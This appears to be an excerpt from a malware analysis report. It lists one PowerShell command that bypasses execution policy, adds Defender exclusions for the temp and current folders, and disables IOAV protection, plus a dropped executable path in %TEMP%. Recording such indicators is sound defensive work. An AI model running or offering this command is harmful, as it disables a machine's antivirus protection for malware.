Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -NonInteractive -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath '%TEMP%\' -ExclusionPath '<Current directory>'; Set-MpPreference -DisableIOAVProtection $true; Stop-...
- %TEMP%\pen000d873d.exe
- %TEMP%\pen000d873d.exe
- '%TEMP%\pen000d873d.exe'